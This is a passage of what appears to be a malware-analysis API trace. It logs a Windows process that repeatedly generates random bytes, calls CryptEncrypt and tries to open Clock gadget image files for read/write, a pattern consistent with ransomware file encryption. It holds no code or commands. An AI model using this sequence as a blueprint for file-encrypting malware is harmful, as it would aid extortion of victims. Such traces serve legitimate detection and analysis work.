| out: pbData=0x31f098*, pdwDataLen=0x25ce858*=0x30) returned 1 [0161.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_rest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.753] GetProcessHeap () returned 0x2c0000 [0161.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.753] GetProcessHeap () returned 0x2c0000 [0161.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c884e0 | out: hHeap=0x2c0000) returned 1 [0161.753] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce858 | out: pbBuffer=0x25ce858) returned 1 [0161.753] GetProcessHeap () returned 0x2c0000 [0161.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.753] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce850*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce850*=0x30) returned 1 [0161.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_pressed.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.753] GetProcessHeap () returned 0x2c0000 [0161.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.754] GetProcessHeap () returned 0x2c0000 [0161.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb73c8 | out: hHeap=0x2c0000) returned 1 [0161.754] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce858 | out: pbBuffer=0x25ce858) returned 1 [0161.754] GetProcessHeap () returned 0x2c0000 [0161.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.754] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce850*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce850*=0x30) returned 1 [0161.754] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_hover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.754] GetProcessHeap () returned 0x2c0000 [0161.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.754] GetProcessHeap () returned 0x2c0000 [0161.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c883d8 | out: hHeap=0x2c0000) returned 1 [0161.754] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce850 | out: pbBuffer=0x25ce850) returned 1 [0161.754] GetProcessHeap () returned 0x2c0000 [0161.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.754] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce848*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce848*=0x30) returned 1 [0161.754] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_disabled.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.755] GetProcessHeap () returned 0x2c0000 [0161.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.755] GetProcessHeap () returned 0x2c0000 [0161.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb72b0 | out: hHeap=0x2c0000) returned 1 [0161.755] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce850 | out: pbBuffer=0x25ce850) returned 1 [0161.755] GetProcessHeap () returned 0x2c0000 [0161.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.755] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce848*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce848*=0x30) returned 1 [0161.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_rest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.755] GetProcessHeap () returned 0x2c0000 [0161.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.755] GetProcessHeap () returned 0x2c0000 [0161.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c882d0 | out: hHeap=0x2c0000) returned 1 [0161.755] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce848 | out: pbBuffer=0x25ce848) returned 1 [0161.755] GetProcessHeap () returned 0x2c0000 [0161.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.756] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce840*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce840*=0x30) returned 1 [0161.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.756] GetProcessHeap () returned 0x2c0000 [0161.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.756] GetProcessHeap () returned 0x2c0000 [0161.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7198 | out: hHeap=0x2c0000) returned 1 [0161.756] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce848 | out: pbBuffer=0x25ce848) returned 1 [0161.756] GetProcessHeap () returned 0x2c0000 [0161.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.756] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce840*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce840*=0x30) returned 1 [0161.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_hover.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_hover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.756] GetProcessHeap () returned 0x2c0000 [0161.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.757] GetProcessHeap () returned 0x2c0000 [0161.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c881c8 | out: hHeap=0x2c0000) returned 1 [0161.757] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce840 | out: pbBuffer=0x25ce840) returned 1 [0161.757] GetProcessHeap () returned 0x2c0000 [0161.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.757] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce838*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce838*=0x30) returned 1 [0161.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_disabled.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_disabled.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.757] GetProcessHeap () returned 0x2c0000 [0161.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.757] GetProcessHeap () returned 0x2c0000 [0161.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7080 | out: hHeap=0x2c0000) returned 1 [0161.757] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce840 | out: pbBuffer=0x25ce840) returned 1 [0161.757] GetProcessHeap () returned 0x2c0000 [0161.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.757] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce838*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce838*=0x30) returned 1 [0161.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.758] GetProcessHeap () returned 0x2c0000 [0161.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.758] GetProcessHeap () returned 0x2c0000 [0161.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb6f68 | out: hHeap=0x2c0000) returned 1 [0161.758] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce838 | out: pbBuffer=0x25ce838) returned 1 [0161.758] GetProcessHeap () returned 0x2c0000 [0161.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.758] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce830*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce830*=0x30) returned 1 [0161.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.758] GetProcessHeap () returned 0x2c0000 [0161.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.758] GetProcessHeap () returned 0x2c0000 [0161.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb6e50 | out: hHeap=0x2c0000) returned 1 [0161.758] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce838 | out: pbBuffer=0x25ce838) returned 1 [0161.758] GetProcessHeap () returned 0x2c0000 [0161.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.759] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce830*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce830*=0x30) returned 1 [0161.759] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.759] GetProcessHeap () returned 0x2c0000 [0161.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.759] GetProcessHeap () returned 0x2c0000 [0161.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaf7b8 | out: hHeap=0x2c0000) returned 1 [0161.759] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce830 | out: pbBuffer=0x25ce830) returned 1 [0161.759] GetProcessHeap () returned 0x2c0000 [0161.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.759] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce828*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce828*=0x30) returned 1 [0161.759] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_top_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.759] GetProcessHeap () returned 0x2c0000 [0161.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.759] GetProcessHeap () returned 0x2c0000 [0161.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb6d38 | out: hHeap=0x2c0000) returned 1 [0161.760] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce830 | out: pbBuffer=0x25ce830) returned 1 [0161.760] GetProcessHeap () returned 0x2c0000 [0161.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.760] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce828*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce828*=0x30) returned 1 [0161.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_top_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.760] GetProcessHeap () returned 0x2c0000 [0161.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.760] GetProcessHeap () returned 0x2c0000 [0161.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb6c20 | out: hHeap=0x2c0000) returned 1 [0161.760] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce828 | out: pbBuffer=0x25ce828) returned 1 [0161.760] GetProcessHeap () returned 0x2c0000 [0161.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.760] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce820*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce820*=0x30) returned 1 [0161.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_bottom_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.760] GetProcessHeap () returned 0x2c0000 [0161.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.761] GetProcessHeap () returned 0x2c0000 [0161.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb6b08 | out: hHeap=0x2c0000) returned 1 [0161.761] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce828 | out: pbBuffer=0x25ce828) returned 1 [0161.761] GetProcessHeap () returned 0x2c0000 [0161.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.761] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce820*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce820*=0x30) returned 1 [0161.761] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_bottom_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.761] GetProcessHeap () returned 0x2c0000 [0161.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.761] GetProcessHeap () returned 0x2c0000 [0161.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb69f0 | out: hHeap=0x2c0000) returned 1 [0161.761] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce820 | out: pbBuffer=0x25ce820) returned 1 [0161.761] GetProcessHeap () returned 0x2c0000 [0161.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.761] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce818*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce818*=0x30) returned 1 [0161.761] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_top.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_top.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.762] GetProcessHeap () returned 0x2c0000 [0161.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.762] GetProcessHeap () returned 0x2c0000 [0161.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaf6b8 | out: hHeap=0x2c0000) returned 1 [0161.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce820 | out: pbBuffer=0x25ce820) returned 1 [0161.762] GetProcessHeap () returned 0x2c0000 [0161.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.762] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce818*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce818*=0x30) returned 1 [0161.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.762] GetProcessHeap () returned 0x2c0000 [0161.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.762] GetProcessHeap () returned 0x2c0000 [0161.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eab9a0 | out: hHeap=0x2c0000) returned 1 [0161.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce818 | out: pbBuffer=0x25ce818) returned 1 [0161.762] GetProcessHeap () returned 0x2c0000 [0161.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.763] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce810*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce810*=0x30) returned 1 [0161.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.763] GetProcessHeap () returned 0x2c0000 [0161.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.763] GetProcessHeap () returned 0x2c0000 [0161.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eab898 | out: hHeap=0x2c0000) returned 1 [0161.763] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce818 | out: pbBuffer=0x25ce818) returned 1 [0161.763] GetProcessHeap () returned 0x2c0000 [0161.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.763] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce810*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce810*=0x30) returned 1 [0161.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_divider_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.763] GetProcessHeap () returned 0x2c0000 [0161.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.763] GetProcessHeap () returned 0x2c0000 [0161.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb68d8 | out: hHeap=0x2c0000) returned 1 [0161.763] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce810 | out: pbBuffer=0x25ce810) returned 1 [0161.764] GetProcessHeap () returned 0x2c0000 [0161.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.764] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce808*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce808*=0x30) returned 1 [0161.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_divider_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.764] GetProcessHeap () returned 0x2c0000 [0161.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.764] GetProcessHeap () returned 0x2c0000 [0161.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb67c0 | out: hHeap=0x2c0000) returned 1 [0161.764] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce810 | out: pbBuffer=0x25ce810) returned 1 [0161.764] GetProcessHeap () returned 0x2c0000 [0161.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.764] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce808*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce808*=0x30) returned 1 [0161.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_bottom.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_bottom.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.828] GetProcessHeap () returned 0x2c0000 [0161.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.828] GetProcessHeap () returned 0x2c0000 [0161.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eab790 | out: hHeap=0x2c0000) returned 1 [0161.828] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce808 | out: pbBuffer=0x25ce808) returned 1 [0161.828] GetProcessHeap () returned 0x2c0000 [0161.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.828] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce800*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce800*=0x30) returned 1 [0161.829] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_h.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 